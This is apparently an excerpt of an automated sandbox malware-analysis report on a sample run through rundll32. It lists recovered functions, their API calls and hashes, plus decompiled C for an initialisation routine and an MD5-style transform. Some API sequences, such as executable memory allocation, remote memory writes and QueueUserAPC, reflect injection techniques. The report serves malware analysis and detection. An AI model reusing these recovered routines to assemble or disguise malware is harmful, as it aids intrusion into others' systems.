                            • Opcode ID: cd4e31c471b134ce8adf4acebfcccbbc1616463c2730681b983148e08b0305f3
                            • Instruction ID: 06df6e07017399d7910ffe913997c915961a117d904cbd3f11fc5d6d9415f32f
                            • Opcode Fuzzy Hash: cd4e31c471b134ce8adf4acebfcccbbc1616463c2730681b983148e08b0305f3
                            • Instruction Fuzzy Hash: 84415E71908355AFE711EF60EC48A6FBBE8FB84708F04092EF585D6150DB35E90ACB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7EAC5 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101COMMON
                            Download Yara Rule
                            APIs
                            • memset.NTDLL ref: 04F7EAE7
                              • Part of subcall function 04F77950: NtAllocateVirtualMemory.NTDLL(04F7EB0F,00000000,00000000,04F7EB0F,00003000,00000040), ref: 04F77981
                              • Part of subcall function 04F77950: RtlNtStatusToDosError.NTDLL(00000000), ref: 04F77988
                              • Part of subcall function 04F77950: SetLastError.KERNEL32(00000000), ref: 04F7798F
                            • GetLastError.KERNEL32(?,00000318,00000008), ref: 04F7EBF7
                              • Part of subcall function 04F636BB: RtlNtStatusToDosError.NTDLL(00000000), ref: 04F636D3
                            • memcpy.NTDLL(00000218,04F838A0,00000100,?,00010003,?,?,00000318,00000008), ref: 04F7EB76
                            • RtlNtStatusToDosError.NTDLL(00000000), ref: 04F7EBD0
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Error$Status$Last$AllocateMemoryVirtualmemcpymemset
                            • String ID:
                            • API String ID: 2966525677-3916222277
                            • Opcode ID: d589a2fcdaff294760617cd112f1517d41a56c6be0fa9c2cd5697ce5bd0b5612
                            • Instruction ID: 6d762be8d3e262cc1e6e99ec492a2b2ee78906e6a79ceece6b67b81cc1935b0e
                            • Opcode Fuzzy Hash: d589a2fcdaff294760617cd112f1517d41a56c6be0fa9c2cd5697ce5bd0b5612
                            • Instruction Fuzzy Hash: 6A314175901209EBEB20DF68DD89AAABBB8EB04314F1045AFE556D7240E738FE45CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7D7F1 Relevance: 7.9, APIs: 6, Instructions: 401COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: memset$memcpy
                            • String ID:
                            • API String ID: 368790112-0
                            • Opcode ID: 8bc67b7684c08cf9e2f10b0909ad597bf476c9827be85f4ba29ce55c157ac1e8
                            • Instruction ID: 1b88aa227635df656fd10770b256b5b48e185e1a1693cb52d332966dafe8bda0
                            • Opcode Fuzzy Hash: 8bc67b7684c08cf9e2f10b0909ad597bf476c9827be85f4ba29ce55c157ac1e8
                            • Instruction Fuzzy Hash: 23F1E070900B99CFDB31CF68C9846AABBF4BF41304F544D6ED5E796682D239BA46CB10
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A16D78 Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E04A16D78(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x4a1a30c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x4a1a2fc = _t4;
					_t6 = GetCurrentProcessId();
					 *0x4a1a2f8 = _t6;
					 *0x4a1a304 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x4a1a2f4 = _t7;
					if(_t7 == 0) {
						 *0x4a1a2f4 =  *0x4a1a2f4 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}









                            0x04a16d80
                            0x04a16d86
                            0x04a16d8d
                            0x00000000
                            0x04a16de7
                            0x04a16d8f
                            0x04a16d97
                            0x04a16da4
                            0x04a16da4
                            0x04a16de4
                            0x00000000
                            0x04a16de4
                            0x04a16da6
                            0x04a16da6
                            0x04a16dab
                            0x04a16dbd
                            0x04a16dc2
                            0x04a16dc8
                            0x04a16dce
                            0x04a16dd5
                            0x04a16dd7
                            0x04a16dd7
                            0x00000000
                            0x04a16dde
                            0x04a16da0
                            0x00000000
                            0x00000000
                            0x04a16da2
                            0x00000000

                            APIs
                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04A11D07,?), ref: 04A16D80
                            • GetVersion.KERNEL32 ref: 04A16D8F
                            • GetCurrentProcessId.KERNEL32 ref: 04A16DAB
                            • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 04A16DC8
                            • GetLastError.KERNEL32 ref: 04A16DE7
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                            • String ID:
                            • API String ID: 2270775618-0
                            • Opcode ID: 3710e5065df99efe3481b3ba5e611c5620583d351a46ff07b93bcd889e2b61eb
                            • Instruction ID: 92d8043d1f86e4e9b3b9b157948dfaef82a1abf6bf25286d6180ca5494fa909a
                            • Opcode Fuzzy Hash: 3710e5065df99efe3481b3ba5e611c5620583d351a46ff07b93bcd889e2b61eb
                            • Instruction Fuzzy Hash: 0CF0C2B47417029BEB208F24AA29B253BB4EB60701F104019E512CE1F0D77DA842CF15
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F6D77A Relevance: 6.1, APIs: 4, Instructions: 114stringnativeCOMMON
                            Download Yara Rule
                            APIs
                            • NtQueryKey.NTDLL(?,00000003,00000000,00000000,?), ref: 04F6D7D0
                            • lstrlenW.KERNEL32(?), ref: 04F6D7DE
                            • NtQueryKey.NTDLL(?,00000003,00000000,?,?), ref: 04F6D809
                            • lstrcpyW.KERNEL32(00000006,00000000), ref: 04F6D837
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Query$lstrcpylstrlen
                            • String ID:
                            • API String ID: 3961825720-0
                            • Opcode ID: 7507ebb71398ed1bb7f1fc1fbbadfc3f060615f69ce508285d78b2d819ea9f60
                            • Instruction ID: 64f95e375e9706928dcc448b32ac88f4a12bfa0500b5c4b5c8336de7fa989920
                            • Opcode Fuzzy Hash: 7507ebb71398ed1bb7f1fc1fbbadfc3f060615f69ce508285d78b2d819ea9f60
                            • Instruction Fuzzy Hash: 2E410E71A00209FFEF119FA4DD88EAE7BB8EF44314F144069F906AB150D775EA12DB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F781F1 Relevance: 6.0, APIs: 4, Instructions: 45pipeCOMMON
                            Download Yara Rule
                            APIs
                            • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,04F8A1E8,00000001), ref: 04F78215
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F78260
                              • Part of subcall function 04F773AA: CreateThread.KERNEL32(00000000,00000000,00000000,04F7893A,04F8A174,04F80998), ref: 04F773C1
                              • Part of subcall function 04F773AA: QueueUserAPC.KERNEL32(04F7893A,00000000,?,?,04F7893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 04F773D6
                              • Part of subcall function 04F773AA: GetLastError.KERNEL32(00000000,?,04F7893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 04F773E1
                              • Part of subcall function 04F773AA: TerminateThread.KERNEL32(00000000,00000000,?,04F7893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 04F773EB
                              • Part of subcall function 04F773AA: CloseHandle.KERNEL32(00000000,?,04F7893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 04F773F2
                              • Part of subcall function 04F773AA: SetLastError.KERNEL32(00000000,?,04F7893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 04F773FB
                            • GetLastError.KERNEL32(04F71FE9,00000000,00000000,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F78248
                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F78258
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$CloseCreateHandleThread$NamedPipeQueueTerminateUser
                            • String ID:
                            • API String ID: 1700061692-0
                            • Opcode ID: 7864f7cf9d16c53906cd24807d4d9b3d953d2b4c5edbcb7ae6b30e597d96ea82
                            • Instruction ID: ee63e17bfd453a5f3be3ed902a12af78856027cf475ab5e199a27ebd59110615
                            • Opcode Fuzzy Hash: 7864f7cf9d16c53906cd24807d4d9b3d953d2b4c5edbcb7ae6b30e597d96ea82
                            • Instruction Fuzzy Hash: 79F0C871745605BFE3112AA8BC8CE773758EF85375B14023AFA25DA2C0DA785C07CAB0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F6B7D5 Relevance: 4.5, APIs: 3, Instructions: 45nativethreadCOMMON
                            Download Yara Rule
                            APIs
                            • NtQueryInformationThread.NTDLL(?,00000000,?,0000001C,00000000), ref: 04F6B7E9
                            • GetLastError.KERNEL32(?,?,?,0000001C,?), ref: 04F6B829
                              • Part of subcall function 04F75312: NtWriteVirtualMemory.NTDLL(?,00000004,00000000,00000000,?,761B6780,?,04F7907F,?,00000004,00000000,00000004,?), ref: 04F75330
                            • RtlNtStatusToDosError.NTDLL(00000000), ref: 04F6B832
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Error$InformationLastMemoryQueryStatusThreadVirtualWrite
                            • String ID:
                            • API String ID: 4036914670-0
                            • Opcode ID: 74325520984d724682189464f07072ba3563ff0b9fc5147b0de0dbbdf0a358ca
                            • Instruction ID: cf5cffab13cd7cf0ad98bec4916c224455d4212ce49147e01932c8e6d310734c
                            • Opcode Fuzzy Hash: 74325520984d724682189464f07072ba3563ff0b9fc5147b0de0dbbdf0a358ca
                            • Instruction Fuzzy Hash: 8301FB75900108FFEF10AAE5ED04DEEBBBDEB84700F540025FA45E6050E775E906EB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F73829 Relevance: 3.0, APIs: 2, Instructions: 48nativeCOMMON
                            Download Yara Rule
                            APIs
                            • NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 04F7385A
                            • RtlNtStatusToDosError.NTDLL(C000009A), ref: 04F73891
                              • Part of subcall function 04F7E803: RtlFreeHeap.NTDLL(00000000,?,04F73953,?,?,04F7BF5B,00000000,00000000,04F610B0,00000000,04F89F2C,00000008,00000003), ref: 04F7E80F
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorFreeHeapInformationQueryStatusSystem
                            • String ID:
                            • API String ID: 2533303245-0
                            • Opcode ID: c76b607580fe8186b88431b5e186cea049343dc7a9af70f5e5f2419374529e9d
                            • Instruction ID: cd45cb8c1ed0e871cdff58351c8ff5637c8529633bb3b1a46d0620f7895a35da
                            • Opcode Fuzzy Hash: c76b607580fe8186b88431b5e186cea049343dc7a9af70f5e5f2419374529e9d
                            • Instruction Fuzzy Hash: 4B01D673D02134BBD7215A548C08AAFBA69DF85B50F16012AED0167100E77CAE02E6D1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F664C4 Relevance: 3.0, APIs: 2, Instructions: 37nativeCOMMON
                            Download Yara Rule
                            APIs
                            • memset.NTDLL ref: 04F664E3
                            • NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000), ref: 04F664FB
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: InformationProcessQuerymemset
                            • String ID:
                            • API String ID: 2040988606-0
                            • Opcode ID: f5fa336e8ccad3b0f18d91065db32632baceccf324fff45850d4ae77aa86124f
                            • Instruction ID: 34fa41b08945da0cecc3eb06b77e841221e34268c067b9097817424086ae1f08
                            • Opcode Fuzzy Hash: f5fa336e8ccad3b0f18d91065db32632baceccf324fff45850d4ae77aa86124f
                            • Instruction Fuzzy Hash: 2EF0127690022CBBEB10DA91DC49FDEBFBCEB14744F404061AE08E6191E774EB55CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F75220 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                            Download Yara Rule
                            APIs
                            • RtlNtStatusToDosError.NTDLL(C0000002), ref: 04F7524D
                            • SetLastError.KERNEL32(00000000,?,04F6C670,?,00000000,00000000,00000004,?,00000000,00000000,761B4EE0,00000000), ref: 04F75254
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Error$LastStatus
                            • String ID:
                            • API String ID: 4076355890-0
                            • Opcode ID: 0878d7adca3a7da85a3845bf04252eb5b410409a2cbabde317531b64fc76da40
                            • Instruction ID: f5c4c99ff87ebc233d92fe6501f73b20d8b6024f3e0adbbb6ba9afe42bf98ba9
                            • Opcode Fuzzy Hash: 0878d7adca3a7da85a3845bf04252eb5b410409a2cbabde317531b64fc76da40
                            • Instruction Fuzzy Hash: 02E0923260011DBBDF015EE8AC05DAE7F59EB4C751B009015FF15D6520D739DD22DBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7FF4D Relevance: 2.9, APIs: 2, Instructions: 416COMMON
                            Download Yara Rule
                            APIs
                            • memset.NTDLL ref: 04F80327
                            • memset.NTDLL ref: 04F80336
                              • Part of subcall function 04F68E0C: memset.NTDLL ref: 04F68E1D
                              • Part of subcall function 04F68E0C: memset.NTDLL ref: 04F68E29
                              • Part of subcall function 04F68E0C: memset.NTDLL ref: 04F68E54
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: memset
                            • String ID:
                            • API String ID: 2221118986-0
                            • Opcode ID: 341406b789a4962d08c25e45005e78c00e508755fad212ceb06da4480133e7e8
                            • Instruction ID: e33da94240e42017e136f62dc95d94f46ab2aa21f49a2b0c7d3ad8cb7630979a
                            • Opcode Fuzzy Hash: 341406b789a4962d08c25e45005e78c00e508755fad212ceb06da4480133e7e8
                            • Instruction Fuzzy Hash: EA023270901B218FC775DF29C690567B7F0BF45724BA14E2ED6E78AA90DA31F48ACB04
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7154D Relevance: 1.9, APIs: 1, Instructions: 611COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: memset
                            • String ID:
                            • API String ID: 2221118986-0
                            • Opcode ID: d9def6b715dbe5854ad3f939d119ea01d0ab3cc14373ec07a817a0717b2aaf57
                            • Instruction ID: 35982ce4d1c4511cff5587cce69a18ebc2ba4a63f8fb69df393c5af1f9fcedbe
                            • Opcode Fuzzy Hash: d9def6b715dbe5854ad3f939d119ea01d0ab3cc14373ec07a817a0717b2aaf57
                            • Instruction Fuzzy Hash: F722857BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A14BF1 Relevance: 1.9, APIs: 1, Instructions: 611COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 49%
                            			E04A14BF1(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t338;
				signed char* _t348;
				signed int _t349;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t357;
				signed int _t359;
				signed int _t361;
				signed int _t363;
				signed int _t365;
				signed int _t367;
				signed int _t376;
				signed int _t378;
				signed int _t380;
				signed int _t382;
				signed int _t384;
				intOrPtr* _t400;
				signed int* _t401;
				signed int _t402;
				signed int _t404;
				signed int _t406;
				signed int _t408;
				signed int _t410;
				signed int _t412;
				signed int _t414;
				signed int _t416;
				signed int _t418;
				signed int _t420;
				signed int _t422;
				signed int _t424;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t438;
				signed int _t440;
				signed int _t508;
				signed int _t599;
				signed int _t607;
				signed int _t613;
				signed int _t679;
				void* _t682;
				signed int _t683;
				signed int _t685;
				signed int _t690;
				signed int _t692;
				signed int _t697;
				signed int _t699;
				signed int _t718;
				signed int _t720;
				signed int _t722;
				signed int _t724;
				signed int _t726;
				signed int _t728;
				signed int _t734;
				signed int _t740;
				signed int _t742;
				signed int _t744;
				signed int _t746;
				signed int _t748;

				_t226 = _a4;
				_t348 = __ecx + 2;
				_t401 =  &_v76;
				_t682 = 0x10;
				do {
					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
					_t401 =  &(_t401[1]);
					_t348 =  &(_t348[4]);
					_t682 = _t682 - 1;
				} while (_t682 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t683 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t402 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t349 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
				asm("rol ecx, 0xc");
				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
				asm("ror esi, 0xa");
				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
				_v8 = _t685;
				_t690 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
				asm("rol ecx, 0xc");
				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
				asm("ror esi, 0xa");
				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
				_v8 = _t692;
				_t697 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
				asm("rol ecx, 0xc");
				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
				asm("ror esi, 0xa");
				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
				_v8 = _t699;
				asm("rol eax, 0x7");
				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
				_t508 =  !_t357;
				asm("ror edx, 0xf");
				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
				_v12 = _t410;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
				asm("rol eax, 0x5");
				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
				asm("rol ecx, 0x9");
				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
				asm("ror esi, 0xc");
				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
				asm("rol eax, 0x5");
				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
				asm("rol ecx, 0x9");
				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
				asm("ror esi, 0xc");
				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
				asm("rol eax, 0x5");
				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
				asm("rol ecx, 0x9");
				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
				asm("ror esi, 0xc");
				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
				asm("rol eax, 0x5");
				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
				asm("rol ecx, 0x9");
				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
				asm("ror esi, 0xc");
				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
				asm("rol eax, 0x4");
				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
				asm("rol ecx, 0xb");
				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
				_t599 = _t367 ^ _t420;
				asm("ror esi, 0x9");
				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
				asm("rol eax, 0x4");
				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
				asm("rol edi, 0xb");
				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
				_t338 = _t607 ^ _t422;
				asm("ror ecx, 0x9");
				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
				asm("rol eax, 0x4");
				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
				asm("rol esi, 0xb");
				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
				_t424 = _t734 ^ _t613;
				asm("ror ecx, 0x9");
				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
				asm("rol eax, 0x4");
				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
				asm("rol edx, 0xb");
				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
				asm("ror ecx, 0x9");
				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
				asm("rol eax, 0x6");
				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
				asm("rol edx, 0xa");
				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
				asm("ror ecx, 0xb");
				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
				asm("rol eax, 0x6");
				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
				asm("rol edx, 0xa");
				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
				asm("ror ecx, 0xb");
				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
				asm("rol eax, 0x6");
				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
				asm("rol edx, 0xa");
				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
				asm("ror edi, 0xb");
				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
				asm("rol eax, 0x6");
				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
				asm("rol edx, 0xa");
				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
				_t400 = _a4;
				asm("rol esi, 0xf");
				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
				 *_t400 =  *_t400 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
				return memset( &_v76, 0, 0x40);
			}


































































































                            0x04a14bf4
                            0x04a14bff
                            0x04a14c02
